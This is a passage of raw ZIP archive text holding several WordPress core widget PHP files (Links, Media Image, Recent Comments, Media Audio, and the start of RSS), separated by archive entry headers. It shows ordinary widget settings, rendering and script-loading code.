					$result = $partPath[$i].($i!=$els ? '/'.$result : '');
			}
		} else $result = '';
		
		return $result;
	}
}
?>PK     \ wAy}  }    class-wp-widget-links.phpnu [        <?php
/**
 * Widget API: WP_Widget_Links class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.4.0
 */

/**
 * Core class used to implement a Links widget.
 *
 * @since 2.8.0
 *
 * @see WP_Widget
 */
class WP_Widget_Links extends WP_Widget {

	/**
	 * Sets up a new Links widget instance.
	 *
	 * @since 2.8.0
	 */
	public function __construct() {
		$widget_ops = array(
			'description'                 => __( 'Your blogroll' ),
			'customize_selective_refresh' => true,
		);
		parent::__construct( 'links', __( 'Links' ), $widget_ops );
	}

	/**
	 * Outputs the content for the current Links widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $args     Display arguments including 'before_title', 'after_title',
	 *                        'before_widget', and 'after_widget'.
	 * @param array $instance Settings for the current Links widget instance.
	 */
	public function widget( $args, $instance ) {
		$show_description = isset( $instance['description'] ) ? $instance['description'] : false;
		$show_name        = isset( $instance['name'] ) ? $instance['name'] : false;
		$show_rating      = isset( $instance['rating'] ) ? $instance['rating'] : false;
		$show_images      = isset( $instance['images'] ) ? $instance['images'] : true;
		$category         = isset( $instance['category'] ) ? $instance['category'] : false;
		$orderby          = isset( $instance['orderby'] ) ? $instance['orderby'] : 'name';
		$order            = 'rating' === $orderby ? 'DESC' : 'ASC';
		$limit            = isset( $instance['limit'] ) ? $instance['limit'] : -1;

		$before_widget = preg_replace( '/ id="[^"]*"/', ' id="%id"', $args['before_widget'] );

		$widget_links_args = array(
			'title_before'     => $args['before_title'],
			'title_after'      => $args['after_title'],
			'category_before'  => $before_widget,
			'category_after'   => $args['after_widget'],
			'show_images'      => $show_images,
			'show_description' => $show_description,
			'show_name'        => $show_name,
			'show_rating'      => $show_rating,
			'category'         => $category,
			'class'            => 'linkcat widget',
			'orderby'          => $orderby,
			'order'            => $order,
			'limit'            => $limit,
		);

		/**
		 * Filters the arguments for the Links widget.
		 *
		 * @since 2.6.0
		 * @since 4.4.0 Added the `$instance` parameter.
		 *
		 * @see wp_list_bookmarks()
		 *
		 * @param array $widget_links_args An array of arguments to retrieve the links list.
		 * @param array $instance          The settings for the particular instance of the widget.
		 */
		wp_list_bookmarks( apply_filters( 'widget_links_args', $widget_links_args, $instance ) );
	}

	/**
	 * Handles updating settings for the current Links widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $new_instance New settings for this instance as input by the user via
	 *                            WP_Widget::form().
	 * @param array $old_instance Old settings for this instance.
	 * @return array Updated settings to save.
	 */
	public function update( $new_instance, $old_instance ) {
		$new_instance = (array) $new_instance;
		$instance     = array(
			'images'      => 0,
			'name'        => 0,
			'description' => 0,
			'rating'      => 0,
		);
		foreach ( $instance as $field => $val ) {
			if ( isset( $new_instance[ $field ] ) ) {
				$instance[ $field ] = 1;
			}
		}

		$instance['orderby'] = 'name';
		if ( in_array( $new_instance['orderby'], array( 'name', 'rating', 'id', 'rand' ), true ) ) {
			$instance['orderby'] = $new_instance['orderby'];
		}

		$instance['category'] = (int) $new_instance['category'];
		$instance['limit']    = ! empty( $new_instance['limit'] ) ? (int) $new_instance['limit'] : -1;

		return $instance;
	}

	/**
	 * Outputs the settings form for the Links widget.
	 *
	 * @since 2.8.0
	 *
	 * @param array $instance Current settings.
	 */
	public function form( $instance ) {

		// Defaults.
		$instance  = wp_parse_args(
			(array) $instance,
			array(
				'images'      => true,
				'name'        => true,
				'description' => false,
				'rating'      => false,
				'category'    => false,
				'orderby'     => 'name',
				'limit'       => -1,
			)
		);
		$link_cats = get_terms( array( 'taxonomy' => 'link_category' ) );
		$limit     = (int) $instance['limit'];
		if ( ! $limit ) {
			$limit = -1;
		}
		?>
		<p>
			<label for="<?php echo $this->get_field_id( 'category' ); ?>"><?php _e( 'Select Link Category:' ); ?></label>
			<select class="widefat" id="<?php echo $this->get_field_id( 'category' ); ?>" name="<?php echo $this->get_field_name( 'category' ); ?>">
				<option value=""><?php _ex( 'All Links', 'links widget' ); ?></option>
				<?php foreach ( $link_cats as $link_cat ) : ?>
					<option value="<?php echo (int) $link_cat->term_id; ?>" <?php selected( $instance['category'], $link_cat->term_id ); ?>>
						<?php echo esc_html( $link_cat->name ); ?>
					</option>
				<?php endforeach; ?>
			</select>
			<label for="<?php echo $this->get_field_id( 'orderby' ); ?>"><?php _e( 'Sort by:' ); ?></label>
			<select name="<?php echo $this->get_field_name( 'orderby' ); ?>" id="<?php echo $this->get_field_id( 'orderby' ); ?>" class="widefat">
				<option value="name"<?php selected( $instance['orderby'], 'name' ); ?>><?php _e( 'Link title' ); ?></option>
				<option value="rating"<?php selected( $instance['orderby'], 'rating' ); ?>><?php _e( 'Link rating' ); ?></option>
				<option value="id"<?php selected( $instance['orderby'], 'id' ); ?>><?php _e( 'Link ID' ); ?></option>
				<option value="rand"<?php selected( $instance['orderby'], 'rand' ); ?>><?php _ex( 'Random', 'Links widget' ); ?></option>
			</select>
		</p>

		<p>
			<input class="checkbox" type="checkbox"<?php checked( $instance['images'], true ); ?> id="<?php echo $this->get_field_id( 'images' ); ?>" name="<?php echo $this->get_field_name( 'images' ); ?>" />
			<label for="<?php echo $this->get_field_id( 'images' ); ?>"><?php _e( 'Show Link Image' ); ?></label>
			<br />

			<input class="checkbox" type="checkbox"<?php checked( $instance['name'], true ); ?> id="<?php echo $this->get_field_id( 'name' ); ?>" name="<?php echo $this->get_field_name( 'name' ); ?>" />
			<label for="<?php echo $this->get_field_id( 'name' ); ?>"><?php _e( 'Show Link Name' ); ?></label>
			<br />

			<input class="checkbox" type="checkbox"<?php checked( $instance['description'], true ); ?> id="<?php echo $this->get_field_id( 'description' ); ?>" name="<?php echo $this->get_field_name( 'description' ); ?>" />
			<label for="<?php echo $this->get_field_id( 'description' ); ?>"><?php _e( 'Show Link Description' ); ?></label>
			<br />

			<input class="checkbox" type="checkbox"<?php checked( $instance['rating'], true ); ?> id="<?php echo $this->get_field_id( 'rating' ); ?>" name="<?php echo $this->get_field_name( 'rating' ); ?>" />
			<label for="<?php echo $this->get_field_id( 'rating' ); ?>"><?php _e( 'Show Link Rating' ); ?></label>
		</p>

		<p>
			<label for="<?php echo $this->get_field_id( 'limit' ); ?>"><?php _e( 'Number of links to show:' ); ?></label>
			<input id="<?php echo $this->get_field_id( 'limit' ); ?>" name="<?php echo $this->get_field_name( 'limit' ); ?>" type="text" value="<?php echo ( -1 !== $limit ) ? (int) $limit : ''; ?>" size="3" />
		</p>
		<?php
	}
}
PK     \q-j1  j1    class-wp-widget-media-image.phpnu [        <?php
/**
 * Widget API: WP_Widget_Media_Image class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.8.0
 */

/**
 * Core class that implements an image widget.
 *
 * @since 4.8.0
 *
 * @see WP_Widget_Media
 * @see WP_Widget
 */
class WP_Widget_Media_Image extends WP_Widget_Media {

	/**
	 * Constructor.
	 *
	 * @since 4.8.0
	 */
	public function __construct() {
		parent::__construct(
			'media_image',
			__( 'Image' ),
			array(
				'description' => __( 'Displays an image.' ),
				'mime_type'   => 'image',
			)
		);

		$this->l10n = array_merge(
			$this->l10n,
			array(
				'no_media_selected'          => __( 'No image selected' ),
				'add_media'                  => _x( 'Add Image', 'label for button in the image widget' ),
				'replace_media'              => _x( 'Replace Image', 'label for button in the image widget; should preferably not be longer than ~13 characters long' ),
				'edit_media'                 => _x( 'Edit Image', 'label for button in the image widget; should preferably not be longer than ~13 characters long' ),
				'missing_attachment'         => sprintf(
					/* translators: %s: URL to media library. */
					__( 'That image cannot be found. Check your <a href="%s">media library</a> and make sure it was not deleted.' ),
					esc_url( admin_url( 'upload.php' ) )
				),
				/* translators: %d: Widget count. */
				'media_library_state_multi'  => _n_noop( 'Image Widget (%d)', 'Image Widget (%d)' ),
				'media_library_state_single' => __( 'Image Widget' ),
			)
		);
	}

	/**
	 * Get schema for properties of a widget instance (item).
	 *
	 * @since 4.8.0
	 *
	 * @see WP_REST_Controller::get_item_schema()
	 * @see WP_REST_Controller::get_additional_fields()
	 * @link https://core.trac.wordpress.org/ticket/35574
	 *
	 * @return array Schema for properties.
	 */
	public function get_instance_schema() {
		return array_merge(
			array(
				'size'              => array(
					'type'        => 'string',
					'enum'        => array_merge( get_intermediate_image_sizes(), array( 'full', 'custom' ) ),
					'default'     => 'medium',
					'description' => __( 'Size' ),
				),
				'width'             => array( // Via 'customWidth', only when size=custom; otherwise via 'width'.
					'type'        => 'integer',
					'minimum'     => 0,
					'default'     => 0,
					'description' => __( 'Width' ),
				),
				'height'            => array( // Via 'customHeight', only when size=custom; otherwise via 'height'.
					'type'        => 'integer',
					'minimum'     => 0,
					'default'     => 0,
					'description' => __( 'Height' ),
				),

				'caption'           => array(
					'type'                  => 'string',
					'default'               => '',
					'sanitize_callback'     => 'wp_kses_post',
					'description'           => __( 'Caption' ),
					'should_preview_update' => false,
				),
				'alt'               => array(
					'type'              => 'string',
					'default'           => '',
					'sanitize_callback' => 'sanitize_text_field',
					'description'       => __( 'Alternative Text' ),
				),
				'link_type'         => array(
					'type'                  => 'string',
					'enum'                  => array( 'none', 'file', 'post', 'custom' ),
					'default'               => 'custom',
					'media_prop'            => 'link',
					'description'           => __( 'Link To' ),
					'should_preview_update' => true,
				),
				'link_url'          => array(
					'type'                  => 'string',
					'default'               => '',
					'format'                => 'uri',
					'media_prop'            => 'linkUrl',
					'description'           => __( 'URL' ),
					'should_preview_update' => true,
				),
				'image_classes'     => array(
					'type'                  => 'string',
					'default'               => '',
					'sanitize_callback'     => array( $this, 'sanitize_token_list' ),
					'media_prop'            => 'extraClasses',
					'description'           => __( 'Image CSS Class' ),
					'should_preview_update' => false,
				),
				'link_classes'      => array(
					'type'                  => 'string',
					'default'               => '',
					'sanitize_callback'     => array( $this, 'sanitize_token_list' ),
					'media_prop'            => 'linkClassName',
					'should_preview_update' => false,
					'description'           => __( 'Link CSS Class' ),
				),
				'link_rel'          => array(
					'type'                  => 'string',
					'default'               => '',
					'sanitize_callback'     => array( $this, 'sanitize_token_list' ),
					'media_prop'            => 'linkRel',
					'description'           => __( 'Link Rel' ),
					'should_preview_update' => false,
				),
				'link_target_blank' => array(
					'type'                  => 'boolean',
					'default'               => false,
					'media_prop'            => 'linkTargetBlank',
					'description'           => __( 'Open link in a new tab' ),
					'should_preview_update' => false,
				),
				'image_title'       => array(
					'type'                  => 'string',
					'default'               => '',
					'sanitize_callback'     => 'sanitize_text_field',
					'media_prop'            => 'title',
					'description'           => __( 'Image Title Attribute' ),
					'should_preview_update' => false,
				),

				/*
				 * There are two additional properties exposed by the PostImage modal
				 * that don't seem to be relevant, as they may only be derived read-only
				 * values:
				 * - originalUrl
				 * - aspectRatio
				 * - height (redundant when size is not custom)
				 * - width (redundant when size is not custom)
				 */
			),
			parent::get_instance_schema()
		);
	}

	/**
	 * Render the media on the frontend.
	 *
	 * @since 4.8.0
	 *
	 * @param array $instance Widget instance props.
	 */
	public function render_media( $instance ) {
		$instance = array_merge( wp_list_pluck( $this->get_instance_schema(), 'default' ), $instance );
		$instance = wp_parse_args(
			$instance,
			array(
				'size' => 'thumbnail',
			)
		);

		$attachment = null;

		if ( $this->is_attachment_with_mime_type( $instance['attachment_id'], $this->widget_options['mime_type'] ) ) {
			$attachment = get_post( $instance['attachment_id'] );
		}

		if ( $attachment ) {
			$caption = '';
			if ( ! isset( $instance['caption'] ) ) {
				$caption = $attachment->post_excerpt;
			} elseif ( trim( $instance['caption'] ) ) {
				$caption = $instance['caption'];
			}

			$image_attributes = array(
				'class' => sprintf( 'image wp-image-%d %s', $attachment->ID, $instance['image_classes'] ),
				'style' => 'max-width: 100%; height: auto;',
			);
			if ( ! empty( $instance['image_title'] ) ) {
				$image_attributes['title'] = $instance['image_title'];
			}

			if ( $instance['alt'] ) {
				$image_attributes['alt'] = $instance['alt'];
			}

			$size = $instance['size'];

			if ( 'custom' === $size || ! in_array( $size, array_merge( get_intermediate_image_sizes(), array( 'full' ) ), true ) ) {
				$size  = array( $instance['width'], $instance['height'] );
				$width = $instance['width'];
			} else {
				$caption_size = _wp_get_image_size_from_meta( $instance['size'], wp_get_attachment_metadata( $attachment->ID ) );
				$width        = empty( $caption_size[0] ) ? 0 : $caption_size[0];
			}

			$image_attributes['class'] .= sprintf( ' attachment-%1$s size-%1$s', is_array( $size ) ? implode( 'x', $size ) : $size );

			$image = wp_get_attachment_image( $attachment->ID, $size, false, $image_attributes );

		} else {
			if ( empty( $instance['url'] ) ) {
				return;
			}

			$instance['size'] = 'custom';
			$caption          = $instance['caption'];
			$width            = $instance['width'];
			$classes          = 'image ' . $instance['image_classes'];
			if ( 0 === $instance['width'] ) {
				$instance['width'] = '';
			}
			if ( 0 === $instance['height'] ) {
				$instance['height'] = '';
			}

			$attr = array(
				'class'  => $classes,
				'src'    => $instance['url'],
				'alt'    => $instance['alt'],
				'width'  => $instance['width'],
				'height' => $instance['height'],
			);

			$loading_optimization_attr = wp_get_loading_optimization_attributes(
				'img',
				$attr,
				'widget_media_image'
			);

			$attr = array_merge( $attr, $loading_optimization_attr );

			$attr  = array_map( 'esc_attr', $attr );
			$image = '<img';

			foreach ( $attr as $name => $value ) {
				$image .= ' ' . $name . '="' . $value . '"';
			}

			$image .= ' />';
		} // End if().

		$url = '';
		if ( 'file' === $instance['link_type'] ) {
			$url = $attachment ? wp_get_attachment_url( $attachment->ID ) : $instance['url'];
		} elseif ( $attachment && 'post' === $instance['link_type'] ) {
			$url = get_attachment_link( $attachment->ID );
		} elseif ( 'custom' === $instance['link_type'] && ! empty( $instance['link_url'] ) ) {
			$url = $instance['link_url'];
		}

		if ( $url ) {
			$link = sprintf( '<a href="%s"', esc_url( $url ) );
			if ( ! empty( $instance['link_classes'] ) ) {
				$link .= sprintf( ' class="%s"', esc_attr( $instance['link_classes'] ) );
			}
			if ( ! empty( $instance['link_rel'] ) ) {
				$link .= sprintf( ' rel="%s"', esc_attr( $instance['link_rel'] ) );
			}
			if ( ! empty( $instance['link_target_blank'] ) ) {
				$link .= ' target="_blank"';
			}
			$link .= '>';
			$link .= $image;
			$link .= '</a>';
			$image = $link;
		}

		if ( $caption ) {
			$image = img_caption_shortcode(
				array(
					'width'   => $width,
					'caption' => $caption,
				),
				$image
			);
		}

		echo $image;
	}

	/**
	 * Loads the required media files for the media manager and scripts for media widgets.
	 *
	 * @since 4.8.0
	 */
	public function enqueue_admin_scripts() {
		parent::enqueue_admin_scripts();

		$handle = 'media-image-widget';
		wp_enqueue_script( $handle );

		$exported_schema = array();
		foreach ( $this->get_instance_schema() as $field => $field_schema ) {
			$exported_schema[ $field ] = wp_array_slice_assoc( $field_schema, array( 'type', 'default', 'enum', 'minimum', 'format', 'media_prop', 'should_preview_update' ) );
		}
		wp_add_inline_script(
			$handle,
			sprintf(
				'wp.mediaWidgets.modelConstructors[ %s ].prototype.schema = %s;',
				wp_json_encode( $this->id_base, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ),
				wp_json_encode( $exported_schema, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES )
			)
		);

		wp_add_inline_script(
			$handle,
			sprintf(
				'
					wp.mediaWidgets.controlConstructors[ %1$s ].prototype.mime_type = %2$s;
					wp.mediaWidgets.controlConstructors[ %1$s ].prototype.l10n = _.extend( {}, wp.mediaWidgets.controlConstructors[ %1$s ].prototype.l10n, %3$s );
				',
				wp_json_encode( $this->id_base, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ),
				wp_json_encode( $this->widget_options['mime_type'], JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ),
				wp_json_encode( $this->l10n, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES )
			)
		);
	}

	/**
	 * Render form template scripts.
	 *
	 * @since 4.8.0
	 */
	public function render_control_template_scripts() {
		parent::render_control_template_scripts();

		?>
		<script type="text/html" id="tmpl-wp-media-widget-image-fields">
			<# var elementIdPrefix = 'el' + String( Math.random() ) + '_'; #>
			<# if ( data.url ) { #>
			<p class="media-widget-image-link">
				<label for="{{ elementIdPrefix }}linkUrl"><?php esc_html_e( 'Link to:' ); ?></label>
				<input id="{{ elementIdPrefix }}linkUrl" type="text" class="widefat link" value="{{ data.link_url }}" placeholder="https://" pattern="((\w+:)?\/\/\w.*|\w+:(?!\/\/$)|\/|\?|#).*">
			</p>
			<# } #>
		</script>
		<script type="text/html" id="tmpl-wp-media-widget-image-preview">
			<# if ( data.error && 'missing_attachment' === data.error ) { #>
				<?php
				wp_admin_notice(
					$this->l10n['missing_attachment'],
					array(
						'type'               => 'error',
						'additional_classes' => array( 'notice-alt', 'notice-missing-attachment' ),
					)
				);
				?>
			<# } else if ( data.error ) { #>
				<?php
				wp_admin_notice(
					__( 'Unable to preview media due to an unknown error.' ),
					array(
						'type'               => 'error',
						'additional_classes' => array( 'notice-alt' ),
					)
				);
				?>
			<# } else if ( data.url ) { #>
				<img class="attachment-thumb" src="{{ data.url }}" draggable="false" alt="{{ data.alt }}"
					<# if ( ! data.alt && data.currentFilename ) { #>
						aria-label="
						<?php
						echo esc_attr(
							sprintf(
								/* translators: %s: The image file name. */
								__( 'The current image has no alternative text. The file name is: %s' ),
								'{{ data.currentFilename }}'
							)
						);
						?>
						"
					<# } #>
				/>
			<# } #>
		</script>
		<?php
	}
}
PK     \a#MH    #  class-wp-widget-recent-comments.phpnu [        <?php
/**
 * Widget API: WP_Widget_Recent_Comments class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.4.0
 */

/**
 * Core class used to implement a Recent Comments widget.
 *
 * @since 2.8.0
 *
 * @see WP_Widget
 */
class WP_Widget_Recent_Comments extends WP_Widget {

	/**
	 * Sets up a new Recent Comments widget instance.
	 *
	 * @since 2.8.0
	 */
	public function __construct() {
		$widget_ops = array(
			'classname'                   => 'widget_recent_comments',
			'description'                 => __( 'Your site&#8217;s most recent comments.' ),
			'customize_selective_refresh' => true,
			'show_instance_in_rest'       => true,
		);
		parent::__construct( 'recent-comments', __( 'Recent Comments' ), $widget_ops );
		$this->alt_option_name = 'widget_recent_comments';

		if ( is_active_widget( false, false, $this->id_base ) || is_customize_preview() ) {
			add_action( 'wp_head', array( $this, 'recent_comments_style' ) );
		}
	}

	/**
	 * Outputs the default styles for the Recent Comments widget.
	 *
	 * @since 2.8.0
	 */
	public function recent_comments_style() {
		/**
		 * Filters the Recent Comments default widget styles.
		 *
		 * @since 3.1.0
		 *
		 * @param bool   $active  Whether the widget is active. Default true.
		 * @param string $id_base The widget ID.
		 */
		if ( ! current_theme_supports( 'widgets' ) // Temp hack #14876.
			|| ! apply_filters( 'show_recent_comments_widget_style', true, $this->id_base ) ) {
			return;
		}

		$type_attr = current_theme_supports( 'html5', 'style' ) ? '' : ' type="text/css"';

		printf(
			'<style%s>.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>',
			$type_attr
		);
	}

	/**
	 * Outputs the content for the current Recent Comments widget instance.
	 *
	 * @since 2.8.0
	 * @since 5.4.0 Creates a unique HTML ID for the `<ul>` element
	 *              if more than one instance is displayed on the page.
	 *
	 * @param array $args     Display arguments including 'before_title', 'after_title',
	 *                        'before_widget', and 'after_widget'.
	 * @param array $instance Settings for the current Recent Comments widget instance.
	 */
	public function widget( $args, $instance ) {
		static $first_instance = true;

		if ( ! isset( $args['widget_id'] ) ) {
			$args['widget_id'] = $this->id;
		}

		$output = '';

		$default_title = __( 'Recent Comments' );
		$title         = ( ! empty( $instance['title'] ) ) ? $instance['title'] : $default_title;

		/** This filter is documented in wp-includes/widgets/class-wp-widget-pages.php */
		$title = apply_filters( 'widget_title', $title, $instance, $this->id_base );

		$number = ( ! empty( $instance['number'] ) ) ? absint( $instance['number'] ) : 5;
		if ( ! $number ) {
			$number = 5;
		}

		$comments = get_comments(
			/**
			 * Filters the arguments for the Recent Comments widget.
			 *
			 * @since 3.4.0
			 * @since 4.9.0 Added the `$instance` parameter.
			 *
			 * @see WP_Comment_Query::query() for information on accepted arguments.
			 *
			 * @param array $comment_args An array of arguments used to retrieve the recent comments.
			 * @param array $instance     Array of settings for the current widget.
			 */
			apply_filters(
				'widget_comments_args',
				array(
					'number'      => $number,
					'status'      => 'approve',
					'post_status' => 'publish',
				),
				$instance
			)
		);

		$output .= $args['before_widget'];
		if ( $title ) {
			$output .= $args['before_title'] . $title . $args['after_title'];
		}

		$recent_comments_id = ( $first_instance ) ? 'recentcomments' : "recentcomments-{$this->number}";
		$first_instance     = false;

		$format = current_theme_supports( 'html5', 'navigation-widgets' ) ? 'html5' : 'xhtml';

		/** This filter is documented in wp-includes/widgets/class-wp-nav-menu-widget.php */
		$format = apply_filters( 'navigation_widgets_format', $format );

		if ( 'html5' === $format ) {
			// The title may be filtered: Strip out HTML and make sure the aria-label is never empty.
			$title      = trim( strip_tags( $title ) );
			$aria_label = $title ? $title : $default_title;
			$output    .= '<nav aria-label="' . esc_attr( $aria_label ) . '">';
		}

		$output .= '<ul id="' . esc_attr( $recent_comments_id ) . '">';
		if ( is_array( $comments ) && $comments ) {
			// Prime cache for associated posts. (Prime post term cache if we need it for permalinks.)
			$post_ids = array_unique( wp_list_pluck( $comments, 'comment_post_ID' ) );
			_prime_post_caches( $post_ids, strpos( get_option( 'permalink_structure' ), '%category%' ), false );

			foreach ( (array) $comments as $comment ) {
				$output .= '<li class="recentcomments">';
				$output .= sprintf(
					/* translators: Comments widget. 1: Comment author, 2: Post link. */
					_x( '%1$s on %2$s', 'widgets' ),
					'<span class="comment-author-link">' . get_comment_author_link( $comment ) . '</span>',
					'<a href="' . esc_url( get_comment_link( $comment ) ) . '">' . get_the_title( $comment->comment_post_ID ) . '</a>'
				);
				$output .= '</li>';
			}
		}
		$output .= '</ul>';

		if ( 'html5' === $format ) {
			$output .= '</nav>';
		}

		$output .= $args['after_widget'];

		echo $output;
	}

	/**
	 * Handles updating settings for the current Recent Comments widget instance.
	 *
	 * @since 2.8.0
	 *
	 * @param array $new_instance New settings for this instance as input by the user via
	 *                            WP_Widget::form().
	 * @param array $old_instance Old settings for this instance.
	 * @return array Updated settings to save.
	 */
	public function update( $new_instance, $old_instance ) {
		$instance           = $old_instance;
		$instance['title']  = sanitize_text_field( $new_instance['title'] );
		$instance['number'] = absint( $new_instance['number'] );
		return $instance;
	}

	/**
	 * Outputs the settings form for the Recent Comments widget.
	 *
	 * @since 2.8.0
	 *
	 * @param array $instance Current settings.
	 */
	public function form( $instance ) {
		$title  = isset( $instance['title'] ) ? $instance['title'] : '';
		$number = isset( $instance['number'] ) ? absint( $instance['number'] ) : 5;
		?>
		<p>
			<label for="<?php echo $this->get_field_id( 'title' ); ?>"><?php _e( 'Title:' ); ?></label>
			<input class="widefat" id="<?php echo $this->get_field_id( 'title' ); ?>" name="<?php echo $this->get_field_name( 'title' ); ?>" type="text" value="<?php echo esc_attr( $title ); ?>" />
		</p>

		<p>
			<label for="<?php echo $this->get_field_id( 'number' ); ?>"><?php _e( 'Number of comments to show:' ); ?></label>
			<input class="tiny-text" id="<?php echo $this->get_field_id( 'number' ); ?>" name="<?php echo $this->get_field_name( 'number' ); ?>" type="number" step="1" min="1" value="<?php echo $number; ?>" size="3" />
		</p>
		<?php
	}

	/**
	 * Flushes the Recent Comments widget cache.
	 *
	 * @since 2.8.0
	 *
	 * @deprecated 4.4.0 Fragment caching was removed in favor of split queries.
	 */
	public function flush_widget_cache() {
		_deprecated_function( __METHOD__, '4.4.0' );
	}
}
PK     \      class-wp-widget-media-audio.phpnu [        <?php
/**
 * Widget API: WP_Widget_Media_Audio class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.8.0
 */

/**
 * Core class that implements an audio widget.
 *
 * @since 4.8.0
 *
 * @see WP_Widget_Media
 * @see WP_Widget
 */
class WP_Widget_Media_Audio extends WP_Widget_Media {

	/**
	 * Constructor.
	 *
	 * @since 4.8.0
	 */
	public function __construct() {
		parent::__construct(
			'media_audio',
			__( 'Audio' ),
			array(
				'description' => __( 'Displays an audio player.' ),
				'mime_type'   => 'audio',
			)
		);

		$this->l10n = array_merge(
			$this->l10n,
			array(
				'no_media_selected'          => __( 'No audio selected' ),
				'add_media'                  => _x( 'Add Audio', 'label for button in the audio widget' ),
				'replace_media'              => _x( 'Replace Audio', 'label for button in the audio widget; should preferably not be longer than ~13 characters long' ),
				'edit_media'                 => _x( 'Edit Audio', 'label for button in the audio widget; should preferably not be longer than ~13 characters long' ),
				'missing_attachment'         => sprintf(
					/* translators: %s: URL to media library. */
					__( 'That audio file cannot be found. Check your <a href="%s">media library</a> and make sure it was not deleted.' ),
					esc_url( admin_url( 'upload.php' ) )
				),
				/* translators: %d: Widget count. */
				'media_library_state_multi'  => _n_noop( 'Audio Widget (%d)', 'Audio Widget (%d)' ),
				'media_library_state_single' => __( 'Audio Widget' ),
				'unsupported_file_type'      => __( 'Looks like this is not the correct kind of file. Please link to an audio file instead.' ),
			)
		);
	}

	/**
	 * Get schema for properties of a widget instance (item).
	 *
	 * @since 4.8.0
	 *
	 * @see WP_REST_Controller::get_item_schema()
	 * @see WP_REST_Controller::get_additional_fields()
	 * @link https://core.trac.wordpress.org/ticket/35574
	 *
	 * @return array Schema for properties.
	 */
	public function get_instance_schema() {
		$schema = array(
			'preload' => array(
				'type'        => 'string',
				'enum'        => array( 'none', 'auto', 'metadata' ),
				'default'     => 'none',
				'description' => __( 'Preload' ),
			),
			'loop'    => array(
				'type'        => 'boolean',
				'default'     => false,
				'description' => __( 'Loop' ),
			),
		);

		foreach ( wp_get_audio_extensions() as $audio_extension ) {
			$schema[ $audio_extension ] = array(
				'type'        => 'string',
				'default'     => '',
				'format'      => 'uri',
				/* translators: %s: Audio extension. */
				'description' => sprintf( __( 'URL to the %s audio source file' ), $audio_extension ),
			);
		}

		return array_merge( $schema, parent::get_instance_schema() );
	}

	/**
	 * Render the media on the frontend.
	 *
	 * @since 4.8.0
	 *
	 * @param array $instance Widget instance props.
	 */
	public function render_media( $instance ) {
		$instance   = array_merge( wp_list_pluck( $this->get_instance_schema(), 'default' ), $instance );
		$attachment = null;

		if ( $this->is_attachment_with_mime_type( $instance['attachment_id'], $this->widget_options['mime_type'] ) ) {
			$attachment = get_post( $instance['attachment_id'] );
		}

		if ( $attachment ) {
			$src = wp_get_attachment_url( $attachment->ID );
		} else {
			$src = $instance['url'];
		}

		echo wp_audio_shortcode(
			array_merge(
				$instance,
				compact( 'src' )
			)
		);
	}

	/**
	 * Enqueue preview scripts.
	 *
	 * These scripts normally are enqueued just-in-time when an audio shortcode is used.
	 * In the customizer, however, widgets can be dynamically added and rendered via
	 * selective refresh, and so it is important to unconditionally enqueue them in
	 * case a widget does get added.
	 *
	 * @since 4.8.0
	 */
	public function enqueue_preview_scripts() {
		/** This filter is documented in wp-includes/media.php */
		if ( 'mediaelement' === apply_filters( 'wp_audio_shortcode_library', 'mediaelement' ) ) {
			wp_enqueue_style( 'wp-mediaelement' );
			wp_enqueue_script( 'wp-mediaelement' );
		}
	}

	/**
	 * Loads the required media files for the media manager and scripts for media widgets.
	 *
	 * @since 4.8.0
	 */
	public function enqueue_admin_scripts() {
		parent::enqueue_admin_scripts();

		wp_enqueue_style( 'wp-mediaelement' );
		wp_enqueue_script( 'wp-mediaelement' );

		$handle = 'media-audio-widget';
		wp_enqueue_script( $handle );

		$exported_schema = array();
		foreach ( $this->get_instance_schema() as $field => $field_schema ) {
			$exported_schema[ $field ] = wp_array_slice_assoc( $field_schema, array( 'type', 'default', 'enum', 'minimum', 'format', 'media_prop', 'should_preview_update' ) );
		}
		wp_add_inline_script(
			$handle,
			sprintf(
				'wp.mediaWidgets.modelConstructors[ %s ].prototype.schema = %s;',
				wp_json_encode( $this->id_base, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ),
				wp_json_encode( $exported_schema, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES )
			)
		);

		wp_add_inline_script(
			$handle,
			sprintf(
				'
					wp.mediaWidgets.controlConstructors[ %1$s ].prototype.mime_type = %2$s;
					wp.mediaWidgets.controlConstructors[ %1$s ].prototype.l10n = _.extend( {}, wp.mediaWidgets.controlConstructors[ %1$s ].prototype.l10n, %3$s );
				',
				wp_json_encode( $this->id_base, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ),
				wp_json_encode( $this->widget_options['mime_type'], JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ),
				wp_json_encode( $this->l10n, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES )
			)
		);
	}

	/**
	 * Render form template scripts.
	 *
	 * @since 4.8.0
	 */
	public function render_control_template_scripts() {
		parent::render_control_template_scripts()
		?>
		<script type="text/html" id="tmpl-wp-media-widget-audio-preview">
			<# if ( data.error && 'missing_attachment' === data.error ) { #>
				<?php
				wp_admin_notice(
					$this->l10n['missing_attachment'],
					array(
						'type'               => 'error',
						'additional_classes' => array( 'notice-alt', 'notice-missing-attachment' ),
					)
				);
				?>
			<# } else if ( data.error ) { #>
				<?php
				wp_admin_notice(
					__( 'Unable to preview media due to an unknown error.' ),
					array(
						'type'               => 'error',
						'additional_classes' => array( 'notice-alt' ),
					)
				);
				?>
			<# } else if ( data.model && data.model.src ) { #>
				<?php wp_underscore_audio_template(); ?>
			<# } #>
		</script>
		<?php
	}
}
PK     \QX|  |    class-wp-widget-rss.phpnu [        <?php
/**
 * Widget API: WP_Widget_RSS class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.4.0
 */

/**
 * Core class used to implement a RSS widget.
 *
 * @since 2.8.0
 *
 * @see WP_Widget
 */
class WP_Widget_RSS extends WP_Widget {

	/**
	 * Sets up a new RSS widget instance.
	 *
	 * @since 2.8.0
	 */
	public function __construct() {
		$widget_ops = array(
